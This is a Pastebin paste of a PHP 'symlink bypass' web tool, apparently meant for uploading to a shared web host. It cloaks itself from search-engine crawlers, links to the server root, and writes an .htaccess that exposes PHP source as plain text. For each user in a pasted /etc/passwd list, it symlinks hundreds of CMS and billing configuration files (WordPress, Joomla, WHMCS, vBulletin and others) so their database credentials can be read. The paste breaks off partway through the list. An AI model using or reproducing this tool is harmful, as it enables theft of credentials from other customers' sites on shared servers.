Advertisement
Hasannetbd

Kashmiri symlink

Jun 17th, 2017
388
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 59.28 KB | None | 0 0
  1.    
  2.    
  3. <?php
  4. /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5.  * Bypass ./Domains ./Users ./Config
  6.  * --------------------
  7.  * Coded by Kashmiri Cheetah
  8.  *---------------------
  9.  * Do not try to Copy my Code go and code by yourself
  10.  *---------------------
  11.  * Made In Dubai, UAE  2015
  12.  *~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
  13. @error_reporting(1);
  14. @set_time_limit(0);
  15. if (!empty($_SERVER['HTTP_USER_AGENT'])) {
  16.     $bot = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
  17.     if (preg_match('/' . implode('|', $bot) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  18.         header('HTTP/1.0 404 Not Found');
  19.         exit;
  20.     }
  21. }
  22. echo '<!DOCTYPE html>
  23. <head>
  24. <title>Bypass ./Config ./User ./Domain By Kashmiri Cheetah</title>
  25. <link rel="shortcut icon" href="/"/>
  26.  
  27. <style type="text/css">
  28. body {
  29. background:
  30. url("http://i.imgur.com/hg21xZ9.png") repeat ,
  31. url("http://images3.alphacoders.com/585/585038.jpg") no-repeat center top,top left,top right;
  32. background-color: #000000;
  33. </style>
  34.  
  35. <style type="text/css">
  36. .newStyle1 {
  37. font-family: Tahoma;
  38. font-size: x-small;
  39. font-weight: bold;
  40. color: #00FFFF;
  41.  text-align: center;
  42. }
  43. </style>
  44. <center><font color="RED"><h1>Symlink Bypass by Kashmiri Cheetah</h1>
  45. </head>
  46. </body>';
  47. if (strtolower(substr(PHP_OS, 0, 3)) == "win") {
  48.     echo '<script>alert("Skid this wont work on Windows")</script>';
  49.     exit;
  50. } else {
  51.     if ($_POST["m"] && !$_POST["passwd"] == "") {
  52.         echo "<center>Done . . <br><br/>";
  53.         $check = @ini_get("disable_functions");
  54.         if (eregi("symlink", $check)) {
  55.             die("<font color=red>Symlink is Disabled</font>");
  56.         }
  57.         @mkdir("Kashmiri_Cheetah", 0777);
  58.         @chdir("Kashmiri_Cheetah");
  59.         @symlink("/", "root");
  60.         $htaccess = "
  61. Options all
  62. Options +Indexes
  63. Options +FollowSymLinks
  64. DirectoryIndex Sux.html
  65. AddType text/plain .php
  66. AddHandler server-parsed .php
  67. AddType text/plain .html
  68. AddHandler txt .html
  69. Require None
  70. Satisfy Any
  71. ";
  72.         file_put_contents(".htaccess", $htaccess, FILE_APPEND);
  73.         $etc_passwd = $_POST["passwd"];
  74.         $etc_passwd = explode("
  75. ", $etc_passwd);
  76.         foreach ($etc_passwd as $passwd) {
  77.             $pawd = explode(":", $passwd);
  78.             $user = $pawd[0];
  79.             @symlink('/home/' . $user . '/public_html/includes/configure.php', $user . '-shop.txt');
  80.             @symlink('/home/' . $user . '/public_html/os/includes/configure.php', $user . '-shop-os.txt');
  81.             @symlink('/home/' . $user . '/public_html/oscom/includes/configure.php', $user . '-oscom.txt');
  82.             @symlink('/home/' . $user . '/public_html/oscommerce/includes/configure.php', $user . '-oscommerce.txt');
  83.             @symlink('/home/' . $user . '/public_html/oscommerces/includes/configure.php', $user . '-oscommerces.txt');
  84.             @symlink('/home/' . $user . '/public_html/shop/includes/configure.php', $user . '-shop2.txt');
  85.             @symlink('/home/' . $user . '/public_html/shopping/includes/configure.php', $user . '-shop-shopping.txt');
  86.             @symlink('/home/' . $user . '/public_html/sale/includes/configure.php', $user . '-sale.txt');
  87.             @symlink('/home/' . $user . '/public_html/amember/config.inc.php', $user . '-amember.txt');
  88.             @symlink('/home/' . $user . '/public_html/config.inc.php', $user . '-amember2.txt');
  89.             @symlink('/home/' . $user . '/public_html/members/configuration.php', $user . '-members.txt');
  90.             @symlink('/home/' . $user . '/public_html/config.php', $user . '-4images1.txt');
  91.             @symlink('/home/' . $user . '/public_html/forum/includes/config.php', $user . '-forum.txt');
  92.             @symlink('/home/' . $user . '/public_html/forums/includes/config.php', $user . '-forums.txt');
  93.             @symlink('/home/' . $user . '/public_html/admin/conf.php', $user . '-5.txt');
  94.             @symlink('/home/' . $user . '/public_html/admin/config.php', $user . '-4.txt');
  95.             @symlink('/home/' . $user . '/public_html/wp-config.php', $user . '-wp13.txt');
  96.             @symlink('/home/' . $user . '/public_html/wp/wp-config.php', $user . '-wp13-wp.txt');
  97.             @symlink('/home/' . $user . '/public_html/WP/wp-config.php', $user . '-wp13-WP.txt');
  98.             @symlink('/home/' . $user . '/public_html/wp/beta/wp-config.php', $user . '-wp13-wp-beta.txt');
  99.             @symlink('/home/' . $user . '/public_html/beta/wp-config.php', $user . '-wp13-beta.txt');
  100.             @symlink('/home/' . $user . '/public_html/press/wp-config.php', $user . '-wp13-press.txt');
  101.             @symlink('/home/' . $user . '/public_html/wordpress/wp-config.php', $user . '-wp13-wordpress.txt');
  102.             @symlink('/home/' . $user . '/public_html/Wordpress/wp-config.php', $user . '-wp13-Wordpress.txt');
  103.             @symlink('/home/' . $user . '/public_html/blog/wp-config.php', $user . '-wp13-Wordpress.txt');
  104.             @symlink('/home/' . $user . '/public_html/wordpress/beta/wp-config.php', $user . '-wp13-wordpress-beta.txt');
  105.             @symlink('/home/' . $user . '/public_html/news/wp-config.php', $user . '-wp13-news.txt');
  106.             @symlink('/home/' . $user . '/public_html/new/wp-config.php', $user . '-wp13-new.txt');
  107.             @symlink('/home/' . $user . '/public_html/blog/wp-config.php', $user . '-wp-blog.txt');
  108.             @symlink('/home/' . $user . '/public_html/beta/wp-config.php', $user . '-wp-beta.txt');
  109.             @symlink('/home/' . $user . '/public_html/blogs/wp-config.php', $user . '-wp-blogs.txt');
  110.             @symlink('/home/' . $user . '/public_html/home/wp-config.php', $user . '-wp-home.txt');
  111.             @symlink('/home/' . $user . '/public_html/protal/wp-config.php', $user . '-wp-protal.txt');
  112.             @symlink('/home/' . $user . '/public_html/site/wp-config.php', $user . '-wp-site.txt');
  113.             @symlink('/home/' . $user . '/public_html/main/wp-config.php', $user . '-wp-main.txt');
  114.             @symlink('/home/' . $user . '/public_html/test/wp-config.php', $user . '-wp-test.txt');
  115.             @symlink('/home/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
  116.             @symlink('/home/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
  117.             @symlink('/home/' . $user . '/public_html/joomla/configuration.php', $user . '-joomla2.txt');
  118.             @symlink('/home/' . $user . '/public_html/protal/configuration.php', $user . '-joomla-protal.txt');
  119.             @symlink('/home/' . $user . '/public_html/joo/configuration.php', $user . '-joo.txt');
  120.             @symlink('/home/' . $user . '/public_html/cms/configuration.php', $user . '-joomla-cms.txt');
  121.             @symlink('/home/' . $user . '/public_html/site/configuration.php', $user . '-joomla-site.txt');
  122.             @symlink('/home/' . $user . '/public_html/main/configuration.php', $user . '-joomla-main.txt');
  123.             @symlink('/home/' . $user . '/public_html/news/configuration.php', $user . '-joomla-news.txt');
  124.             @symlink('/home/' . $user . '/public_html/new/configuration.php', $user . '-joomla-new.txt');
  125.             @symlink('/home/' . $user . '/public_html/home/configuration.php', $user . '-joomla-home.txt');
  126.             @symlink('/home/' . $user . '/public_html/vb/includes/config.php', $user . '-vb-config.txt');
  127.             @symlink('/home/' . $user . '/public_html/vb3/includes/config.php', $user . '-vb3-config.txt');
  128.             @symlink('/home/' . $user . '/public_html/cc/includes/config.php', $user . '-vb1-config.txt');
  129.             @symlink('/home/' . $user . '/public_html/includes/config.php', $user . '-includes-vb.txt');
  130.             @symlink('/home/' . $user . '/public_html/forum/includes/class_core.php', $user . '-vbluttin-class_core.php.txt');
  131.             @symlink('/home/' . $user . '/public_html/vb/includes/class_core.php', $user . '-vbluttin-class_core.php1.txt');
  132.             @symlink('/home/' . $user . '/public_html/cc/includes/class_core.php', $user . '-vbluttin-class_core.php2.txt');
  133.             @symlink('/home/' . $user . '/public_html/configuration.php', $user . '-joomla.txt');
  134.             @symlink('/home/' . $user . '/public_html/includes/dist-configure.php', $user . '-zencart.txt');
  135.             @symlink('/home/' . $user . '/public_html/zencart/includes/dist-configure.php', $user . '-shop-zencart.txt');
  136.             @symlink('/home/' . $user . '/public_html/shop/includes/dist-configure.php', $user . '-shop-ZCshop.txt');
  137.             @symlink('/home/' . $user . '/public_html/Settings.php', $user . '-smf.txt');
  138.             @symlink('/home/' . $user . '/public_html/smf/Settings.php', $user . '-smf2.txt');
  139.             @symlink('/home/' . $user . '/public_html/forum/Settings.php', $user . '-smf-forum.txt');
  140.             @symlink('/home/' . $user . '/public_html/forums/Settings.php', $user . '-smf-forums.txt');
  141.             @symlink('/home/' . $user . '/public_html/upload/includes/config.php', $user . '-up.txt');
  142.             @symlink('/home/' . $user . '/public_html/article/config.php', $user . '-Nwahy.txt');
  143.             @symlink('/home/' . $user . '/public_html/up/includes/config.php', $user . '-up2.txt');
  144.             @symlink('/home/' . $user . '/public_html/conf_global.php', $user . '-6.txt');
  145.             @symlink('/home/' . $user . '/public_html/include/db.php', $user . '-7.txt');
  146.             @symlink('/home/' . $user . '/public_html/connect.php', $user . '-PHP-Fusion.txt');
  147.             @symlink('/home/' . $user . '/public_html/mk_conf.php', $user . '-9.txt');
  148.             @symlink('/home/' . $user . '/public_html/includes/config.php', $user . '-traidnt1.txt');
  149.             @symlink('/home/' . $user . '/public_html/config.php', $user . '-4images.txt');
  150.             @symlink('/home/' . $user . '/public_html/sites/default/settings.php', $user . '-Drupal.txt');
  151.             @symlink('/home/' . $user . '/public_html/member/configuration.php', $user . '-1member.txt');
  152.             @symlink('/home/' . $user . '/public_html/supports/includes/iso4217.php', $user . '-hostbills-supports.txt');
  153.             @symlink('/home/' . $user . '/public_html/client/includes/iso4217.php', $user . '-hostbills-client.txt');
  154.             @symlink('/home/' . $user . '/public_html/support/includes/iso4217.php', $user . '-hostbills-support.txt');
  155.             @symlink('/home/' . $user . '/public_html/billing/includes/iso4217.php', $user . '-hostbills-billing.txt');
  156.             @symlink('/home/' . $user . '/public_html/billings/includes/iso4217.php', $user . '-hostbills-billings.txt');
  157.             @symlink('/home/' . $user . '/public_html/host/includes/iso4217.php', $user . '-hostbills-host.txt');
  158.             @symlink('/home/' . $user . '/public_html/hosts/includes/iso4217.php', $user . '-hostbills-hosts.txt');
  159.             @symlink('/home/' . $user . '/public_html/hosting/includes/iso4217.php', $user . '-hostbills-hosting.txt');
  160.             @symlink('/home/' . $user . '/public_html/hostings/includes/iso4217.php', $user . '-hostbills-hostings.txt');
  161.             @symlink('/home/' . $user . '/public_html/includes/iso4217.php', $user . '-hostbills.txt');
  162.             @symlink('/home/' . $user . '/public_html/hostbills/includes/iso4217.php', $user . '-hostbills-hostbills.txt');
  163.             @symlink('/home/' . $user . '/public_html/hostbill/includes/iso4217.php', $user . '-hostbills-hostbill.txt');
  164.             @symlink('/home/' . $user . '/public_html/cart/configuration.php', $user . '-cart-WHMCS.txt');
  165.             @symlink('/home/' . $user . '/public_html/hosting/configuration.php', $user . '-hosting-WHMCS.txt');
  166.             @symlink('/home/' . $user . '/public_html/buy/configuration.php', $user . '-buy-WHMCS.txt');
  167.             @symlink('/home/' . $user . '/public_html/checkout/configuration.php', $user . '-checkout-WHMCS.txt');
  168.             @symlink('/home/' . $user . '/public_html/host/configuration.php', $user . '-host-WHMCS.txt');
  169.             @symlink('/home/' . $user . '/public_html/shop/configuration.php', $user . '-shop-WHMCS.txt');
  170.             @symlink('/home/' . $user . '/public_html/shopping/configuration.php', $user . '-shopping-WHMCS.txt');
  171.             @symlink('/home/' . $user . '/public_html/sale/configuration.php', $user . '-sale-WHMCS.txt');
  172.             @symlink('/home/' . $user . '/public_html/client/configuration.php', $user . '-client-WHMCS.txt');
  173.             @symlink('/home/' . $user . '/public_html/support/configuration.php', $user . '-support-WHMCS.txt');
  174.             @symlink('/home/' . $user . '/public_html/clientsupport/configuration.php', $user . '-clientsupport-WHMCS.txt');
  175.             @symlink('/home/' . $user . '/public_html/whm/whmcs/configuration.php', $user . '-whm-whmcs.txt');
  176.             @symlink('/home/' . $user . '/public_html/whm/WHMCS/configuration.php', $user . '-whm-WHMCS.txt');
  177.             @symlink('/home/' . $user . '/public_html/whmc/WHM/configuration.php', $user . '-whmc-WHM.txt');
  178.             @symlink('/home/' . $user . '/public_html/whmcs/configuration.php', $user . '-whmc-WHMCS.txt');
  179.             @symlink('/home/' . $user . '/public_html/supp/configuration.php', $user . '-supp-WHMCS.txt');
  180.             @symlink('/home/' . $user . '/public_html/secure/configuration.php', $user . '-sucure-WHMCS.txt');
  181.             @symlink('/home/' . $user . '/public_html/secure/whm/configuration.php', $user . '-sucure-whm-WHMCS.txt');
  182.             @symlink('/home/' . $user . '/public_html/secure/whmcs/configuration.php', $user . '-sucure-whmcs-WHMCS.txt');
  183.             @symlink('/home/' . $user . '/public_html/panel/configuration.php', $user . '-panel-WHMCS.txt');
  184.             @symlink('/home/' . $user . '/public_html/hosts/configuration.php', $user . '-hosts-WHMCS.txt');
  185.             @symlink('/home/' . $user . '/public_html/submitticket.php', $user . '-submitticket-WHMCS.txt');
  186.             @symlink('/home/' . $user . '/public_html/clients/configuration.php', $user . '-clients-WHMCS.txt');
  187.             @symlink('/home/' . $user . '/public_html/clientes/configuration.php', $user . '-clientes-WHMCS.txt');
  188.             @symlink('/home/' . $user . '/public_html/cliente/configuration.php', $user . '-client-WHMCS.txt');
  189.             @symlink('/home/' . $user . '/public_html/billing/configuration.php', $user . '-billing-WHMCS.txt');
  190.             @symlink('/home/' . $user . '/public_html/manage/configuration.php', $user . '-whm-manage-WHMCS.txt');
  191.             @symlink('/home/' . $user . '/public_html/my/configuration.php', $user . '-whm-my-WHMCS.txt');
  192.             @symlink('/home/' . $user . '/public_html/myshop/configuration.php', $user . '-whm-myshop-WHMCS.txt');
  193.             @symlink('/home/' . $user . '/public_html/billings/configuration.php', $user . '-billings-WHMCS.txt');
  194.             @symlink('/home/' . $user . '/public_html/supports/configuration.php', $user . '-supports-WHMCS.txt');
  195.             @symlink('/home/' . $user . '/public_html/auto/configuration.php', $user . '-auto-WHMCS.txt');
  196.             @symlink('/home/' . $user . '/public_html/go/configuration.php', $user . '-go-WHMCS.txt');
  197.             @symlink('/home/' . $user . '/public_html/' . $user . '/configuration.php', $user . '-USERNAME-WHMCS.txt');
  198.             @symlink('/home/' . $user . '/public_html/bill/configuration.php', $user . '-bill-WHMCS.txt');
  199.             @symlink('/home/' . $user . '/public_html/payment/configuration.php', $user . '-payment-WHMCS.txt');
  200.             @symlink('/home/' . $user . '/public_html/pay/configuration.php', $user . '-pay-WHMCS.txt');
  201.             @symlink('/home/' . $user . '/public_html/purchase/configuration.php', $user . '-purchase-WHMCS.txt');
  202.             @symlink('/home/' . $user . '/public_html/clientarea/configuration.php', $user . '-clientarea-WHMCS.txt');
  203.             @symlink('/home/' . $user . '/public_html/autobuy/configuration.php', $user . '-autobuy-WHMCS.txt');
  204.             @symlink('/home2/' . $user . '/public_html/includes/configure.php', $user . '-shop.txt');
  205.             @symlink('/home2/' . $user . '/public_html/os/includes/configure.php', $user . '-shop-os.txt');
  206.             @symlink('/home2/' . $user . '/public_html/oscom/includes/configure.php', $user . '-oscom.txt');
  207.             @symlink('/home2/' . $user . '/public_html/oscommerce/includes/configure.php', $user . '-oscommerce.txt');
  208.             @symlink('/home2/' . $user . '/public_html/oscommerces/includes/configure.php', $user . '-oscommerces.txt');
  209.             @symlink('/home2/' . $user . '/public_html/shop/includes/configure.php', $user . '-shop2.txt');
  210.             @symlink('/home2/' . $user . '/public_html/shopping/includes/configure.php', $user . '-shop-shopping.txt');
  211.             @symlink('/home2/' . $user . '/public_html/sale/includes/configure.php', $user . '-sale.txt');
  212.             @symlink('/home2/' . $user . '/public_html/amember/config.inc.php', $user . '-amember.txt');
  213.             @symlink('/home2/' . $user . '/public_html/config.inc.php', $user . '-amember2.txt');
  214.             @symlink('/home2/' . $user . '/public_html/members/configuration.php', $user . '-members.txt');
  215.             @symlink('/home2/' . $user . '/public_html/config.php', $user . '-4images1.txt');
  216.             @symlink('/home2/' . $user . '/public_html/forum/includes/config.php', $user . '-forum.txt');
  217.             @symlink('/home2/' . $user . '/public_html/forums/includes/config.php', $user . '-forums.txt');
  218.             @symlink('/home2/' . $user . '/public_html/admin/conf.php', $user . '-5.txt');
  219.             @symlink('/home2/' . $user . '/public_html/admin/config.php', $user . '-4.txt');
  220.             @symlink('/home2/' . $user . '/public_html/wp-config.php', $user . '-wp13.txt');
  221.             @symlink('/home2/' . $user . '/public_html/wp/wp-config.php', $user . '-wp13-wp.txt');
  222.             @symlink('/home2/' . $user . '/public_html/WP/wp-config.php', $user . '-wp13-WP.txt');
  223.             @symlink('/home2/' . $user . '/public_html/wp/beta/wp-config.php', $user . '-wp13-wp-beta.txt');
  224.             @symlink('/home2/' . $user . '/public_html/beta/wp-config.php', $user . '-wp13-beta.txt');
  225.             @symlink('/home2/' . $user . '/public_html/press/wp-config.php', $user . '-wp13-press.txt');
  226.             @symlink('/home2/' . $user . '/public_html/wordpress/wp-config.php', $user . '-wp13-wordpress.txt');
  227.             @symlink('/home2/' . $user . '/public_html/Wordpress/wp-config.php', $user . '-wp13-Wordpress.txt');
  228.             @symlink('/home2/' . $user . '/public_html/blog/wp-config.php', $user . '-wp13-Wordpress.txt');
  229.             @symlink('/home2/' . $user . '/public_html/wordpress/beta/wp-config.php', $user . '-wp13-wordpress-beta.txt');
  230.             @symlink('/home2/' . $user . '/public_html/news/wp-config.php', $user . '-wp13-news.txt');
  231.             @symlink('/home2/' . $user . '/public_html/new/wp-config.php', $user . '-wp13-new.txt');
  232.             @symlink('/home2/' . $user . '/public_html/blog/wp-config.php', $user . '-wp-blog.txt');
  233.             @symlink('/home2/' . $user . '/public_html/beta/wp-config.php', $user . '-wp-beta.txt');
  234.             @symlink('/home2/' . $user . '/public_html/blogs/wp-config.php', $user . '-wp-blogs.txt');
  235.             @symlink('/home2/' . $user . '/public_html/home2/wp-config.php', $user . '-wp-home2.txt');
  236.             @symlink('/home2/' . $user . '/public_html/protal/wp-config.php', $user . '-wp-protal.txt');
  237.             @symlink('/home2/' . $user . '/public_html/site/wp-config.php', $user . '-wp-site.txt');
  238.             @symlink('/home2/' . $user . '/public_html/main/wp-config.php', $user . '-wp-main.txt');
  239.             @symlink('/home2/' . $user . '/public_html/test/wp-config.php', $user . '-wp-test.txt');
  240.             @symlink('/home2/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
  241.             @symlink('/home2/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
  242.             @symlink('/home2/' . $user . '/public_html/joomla/configuration.php', $user . '-joomla2.txt');
  243.             @symlink('/home2/' . $user . '/public_html/protal/configuration.php', $user . '-joomla-protal.txt');
  244.             @symlink('/home2/' . $user . '/public_html/joo/configuration.php', $user . '-joo.txt');
  245.             @symlink('/home2/' . $user . '/public_html/cms/configuration.php', $user . '-joomla-cms.txt');
  246.             @symlink('/home2/' . $user . '/public_html/site/configuration.php', $user . '-joomla-site.txt');
  247.             @symlink('/home2/' . $user . '/public_html/main/configuration.php', $user . '-joomla-main.txt');
  248.             @symlink('/home2/' . $user . '/public_html/news/configuration.php', $user . '-joomla-news.txt');
  249.             @symlink('/home2/' . $user . '/public_html/new/configuration.php', $user . '-joomla-new.txt');
  250.             @symlink('/home2/' . $user . '/public_html/home2/configuration.php', $user . '-joomla-home2.txt');
  251.             @symlink('/home2/' . $user . '/public_html/vb/includes/config.php', $user . '-vb-config.txt');
  252.             @symlink('/home2/' . $user . '/public_html/vb3/includes/config.php', $user . '-vb3-config.txt');
  253.             @symlink('/home2/' . $user . '/public_html/cc/includes/config.php', $user . '-vb1-config.txt');
  254.             @symlink('/home2/' . $user . '/public_html/includes/config.php', $user . '-includes-vb.txt');
  255.             @symlink('/home2/' . $user . '/public_html/forum/includes/class_core.php', $user . '-vbluttin-class_core.php.txt');
  256.             @symlink('/home2/' . $user . '/public_html/vb/includes/class_core.php', $user . '-vbluttin-class_core.php1.txt');
  257.             @symlink('/home2/' . $user . '/public_html/cc/includes/class_core.php', $user . '-vbluttin-class_core.php2.txt');
  258.             @symlink('/home2/' . $user . '/public_html/configuration.php', $user . '-joomla.txt');
  259.             @symlink('/home2/' . $user . '/public_html/includes/dist-configure.php', $user . '-zencart.txt');
  260.             @symlink('/home2/' . $user . '/public_html/zencart/includes/dist-configure.php', $user . '-shop-zencart.txt');
  261.             @symlink('/home2/' . $user . '/public_html/shop/includes/dist-configure.php', $user . '-shop-ZCshop.txt');
  262.             @symlink('/home2/' . $user . '/public_html/Settings.php', $user . '-smf.txt');
  263.             @symlink('/home2/' . $user . '/public_html/smf/Settings.php', $user . '-smf2.txt');
  264.             @symlink('/home2/' . $user . '/public_html/forum/Settings.php', $user . '-smf-forum.txt');
  265.             @symlink('/home2/' . $user . '/public_html/forums/Settings.php', $user . '-smf-forums.txt');
  266.             @symlink('/home2/' . $user . '/public_html/upload/includes/config.php', $user . '-up.txt');
  267.             @symlink('/home2/' . $user . '/public_html/article/config.php', $user . '-Nwahy.txt');
  268.             @symlink('/home2/' . $user . '/public_html/up/includes/config.php', $user . '-up2.txt');
  269.             @symlink('/home2/' . $user . '/public_html/conf_global.php', $user . '-6.txt');
  270.             @symlink('/home2/' . $user . '/public_html/include/db.php', $user . '-7.txt');
  271.             @symlink('/home2/' . $user . '/public_html/connect.php', $user . '-PHP-Fusion.txt');
  272.             @symlink('/home2/' . $user . '/public_html/mk_conf.php', $user . '-9.txt');
  273.             @symlink('/home2/' . $user . '/public_html/includes/config.php', $user . '-traidnt1.txt');
  274.             @symlink('/home2/' . $user . '/public_html/config.php', $user . '-4images.txt');
  275.             @symlink('/home2/' . $user . '/public_html/sites/default/settings.php', $user . '-Drupal.txt');
  276.             @symlink('/home2/' . $user . '/public_html/member/configuration.php', $user . '-1member.txt');
  277.             @symlink('/home2/' . $user . '/public_html/supports/includes/iso4217.php', $user . '-hostbills-supports.txt');
  278.             @symlink('/home2/' . $user . '/public_html/client/includes/iso4217.php', $user . '-hostbills-client.txt');
  279.             @symlink('/home2/' . $user . '/public_html/support/includes/iso4217.php', $user . '-hostbills-support.txt');
  280.             @symlink('/home2/' . $user . '/public_html/billing/includes/iso4217.php', $user . '-hostbills-billing.txt');
  281.             @symlink('/home2/' . $user . '/public_html/billings/includes/iso4217.php', $user . '-hostbills-billings.txt');
  282.             @symlink('/home2/' . $user . '/public_html/host/includes/iso4217.php', $user . '-hostbills-host.txt');
  283.             @symlink('/home2/' . $user . '/public_html/hosts/includes/iso4217.php', $user . '-hostbills-hosts.txt');
  284.             @symlink('/home2/' . $user . '/public_html/hosting/includes/iso4217.php', $user . '-hostbills-hosting.txt');
  285.             @symlink('/home2/' . $user . '/public_html/hostings/includes/iso4217.php', $user . '-hostbills-hostings.txt');
  286.             @symlink('/home2/' . $user . '/public_html/includes/iso4217.php', $user . '-hostbills.txt');
  287.             @symlink('/home2/' . $user . '/public_html/hostbills/includes/iso4217.php', $user . '-hostbills-hostbills.txt');
  288.             @symlink('/home2/' . $user . '/public_html/hostbill/includes/iso4217.php', $user . '-hostbills-hostbill.txt');
  289.             @symlink('/home2/' . $user . '/public_html/cart/configuration.php', $user . '-cart-WHMCS.txt');
  290.             @symlink('/home2/' . $user . '/public_html/hosting/configuration.php', $user . '-hosting-WHMCS.txt');
  291.             @symlink('/home2/' . $user . '/public_html/buy/configuration.php', $user . '-buy-WHMCS.txt');
  292.             @symlink('/home2/' . $user . '/public_html/checkout/configuration.php', $user . '-checkout-WHMCS.txt');
  293.             @symlink('/home2/' . $user . '/public_html/host/configuration.php', $user . '-host-WHMCS.txt');
  294.             @symlink('/home2/' . $user . '/public_html/shop/configuration.php', $user . '-shop-WHMCS.txt');
  295.             @symlink('/home2/' . $user . '/public_html/shopping/configuration.php', $user . '-shopping-WHMCS.txt');
  296.             @symlink('/home2/' . $user . '/public_html/sale/configuration.php', $user . '-sale-WHMCS.txt');
  297.             @symlink('/home2/' . $user . '/public_html/client/configuration.php', $user . '-client-WHMCS.txt');
  298.             @symlink('/home2/' . $user . '/public_html/support/configuration.php', $user . '-support-WHMCS.txt');
  299.             @symlink('/home2/' . $user . '/public_html/clientsupport/configuration.php', $user . '-clientsupport-WHMCS.txt');
  300.             @symlink('/home2/' . $user . '/public_html/whm/whmcs/configuration.php', $user . '-whm-whmcs.txt');
  301.             @symlink('/home2/' . $user . '/public_html/whm/WHMCS/configuration.php', $user . '-whm-WHMCS.txt');
  302.             @symlink('/home2/' . $user . '/public_html/whmc/WHM/configuration.php', $user . '-whmc-WHM.txt');
  303.             @symlink('/home2/' . $user . '/public_html/whmcs/configuration.php', $user . '-whmc-WHMCS.txt');
  304.             @symlink('/home2/' . $user . '/public_html/supp/configuration.php', $user . '-supp-WHMCS.txt');
  305.             @symlink('/home2/' . $user . '/public_html/secure/configuration.php', $user . '-sucure-WHMCS.txt');
  306.             @symlink('/home2/' . $user . '/public_html/secure/whm/configuration.php', $user . '-sucure-whm-WHMCS.txt');
  307.             @symlink('/home2/' . $user . '/public_html/secure/whmcs/configuration.php', $user . '-sucure-whmcs-WHMCS.txt');
  308.             @symlink('/home2/' . $user . '/public_html/panel/configuration.php', $user . '-panel-WHMCS.txt');
  309.             @symlink('/home2/' . $user . '/public_html/hosts/configuration.php', $user . '-hosts-WHMCS.txt');
  310.             @symlink('/home2/' . $user . '/public_html/submitticket.php', $user . '-submitticket-WHMCS.txt');
  311.             @symlink('/home2/' . $user . '/public_html/clients/configuration.php', $user . '-clients-WHMCS.txt');
  312.             @symlink('/home2/' . $user . '/public_html/clientes/configuration.php', $user . '-clientes-WHMCS.txt');
  313.             @symlink('/home2/' . $user . '/public_html/cliente/configuration.php', $user . '-client-WHMCS.txt');
  314.             @symlink('/home2/' . $user . '/public_html/billing/configuration.php', $user . '-billing-WHMCS.txt');
  315.             @symlink('/home2/' . $user . '/public_html/manage/configuration.php', $user . '-whm-manage-WHMCS.txt');
  316.             @symlink('/home2/' . $user . '/public_html/my/configuration.php', $user . '-whm-my-WHMCS.txt');
  317.             @symlink('/home2/' . $user . '/public_html/myshop/configuration.php', $user . '-whm-myshop-WHMCS.txt');
  318.             @symlink('/home2/' . $user . '/public_html/billings/configuration.php', $user . '-billings-WHMCS.txt');
  319.             @symlink('/home2/' . $user . '/public_html/supports/configuration.php', $user . '-supports-WHMCS.txt');
  320.             @symlink('/home2/' . $user . '/public_html/auto/configuration.php', $user . '-auto-WHMCS.txt');
  321.             @symlink('/home2/' . $user . '/public_html/go/configuration.php', $user . '-go-WHMCS.txt');
  322.             @symlink('/home2/' . $user . '/public_html/' . $user . '/configuration.php', $user . '-USERNAME-WHMCS.txt');
  323.             @symlink('/home2/' . $user . '/public_html/bill/configuration.php', $user . '-bill-WHMCS.txt');
  324.             @symlink('/home2/' . $user . '/public_html/payment/configuration.php', $user . '-payment-WHMCS.txt');
  325.             @symlink('/home2/' . $user . '/public_html/pay/configuration.php', $user . '-pay-WHMCS.txt');
  326.             @symlink('/home2/' . $user . '/public_html/purchase/configuration.php', $user . '-purchase-WHMCS.txt');
  327.             @symlink('/home2/' . $user . '/public_html/clientarea/configuration.php', $user . '-clientarea-WHMCS.txt');
  328.             @symlink('/home2/' . $user . '/public_html/autobuy/configuration.php', $user . '-autobuy-WHMCS.txt');
  329.             @symlink('/home3/' . $user . '/public_html/includes/configure.php', $user . '-shop.txt');
  330.             @symlink('/home3/' . $user . '/public_html/os/includes/configure.php', $user . '-shop-os.txt');
  331.             @symlink('/home3/' . $user . '/public_html/oscom/includes/configure.php', $user . '-oscom.txt');
  332.             @symlink('/home3/' . $user . '/public_html/oscommerce/includes/configure.php', $user . '-oscommerce.txt');
  333.             @symlink('/home3/' . $user . '/public_html/oscommerces/includes/configure.php', $user . '-oscommerces.txt');
  334.             @symlink('/home3/' . $user . '/public_html/shop/includes/configure.php', $user . '-shop2.txt');
  335.             @symlink('/home3/' . $user . '/public_html/shopping/includes/configure.php', $user . '-shop-shopping.txt');
  336.             @symlink('/home3/' . $user . '/public_html/sale/includes/configure.php', $user . '-sale.txt');
  337.             @symlink('/home3/' . $user . '/public_html/amember/config.inc.php', $user . '-amember.txt');
  338.             @symlink('/home3/' . $user . '/public_html/config.inc.php', $user . '-amember2.txt');
  339.             @symlink('/home3/' . $user . '/public_html/members/configuration.php', $user . '-members.txt');
  340.             @symlink('/home3/' . $user . '/public_html/config.php', $user . '-4images1.txt');
  341.             @symlink('/home3/' . $user . '/public_html/forum/includes/config.php', $user . '-forum.txt');
  342.             @symlink('/home3/' . $user . '/public_html/forums/includes/config.php', $user . '-forums.txt');
  343.             @symlink('/home3/' . $user . '/public_html/admin/conf.php', $user . '-5.txt');
  344.             @symlink('/home3/' . $user . '/public_html/admin/config.php', $user . '-4.txt');
  345.             @symlink('/home3/' . $user . '/public_html/wp-config.php', $user . '-wp13.txt');
  346.             @symlink('/home3/' . $user . '/public_html/wp/wp-config.php', $user . '-wp13-wp.txt');
  347.             @symlink('/home3/' . $user . '/public_html/WP/wp-config.php', $user . '-wp13-WP.txt');
  348.             @symlink('/home3/' . $user . '/public_html/wp/beta/wp-config.php', $user . '-wp13-wp-beta.txt');
  349.             @symlink('/home3/' . $user . '/public_html/beta/wp-config.php', $user . '-wp13-beta.txt');
  350.             @symlink('/home3/' . $user . '/public_html/press/wp-config.php', $user . '-wp13-press.txt');
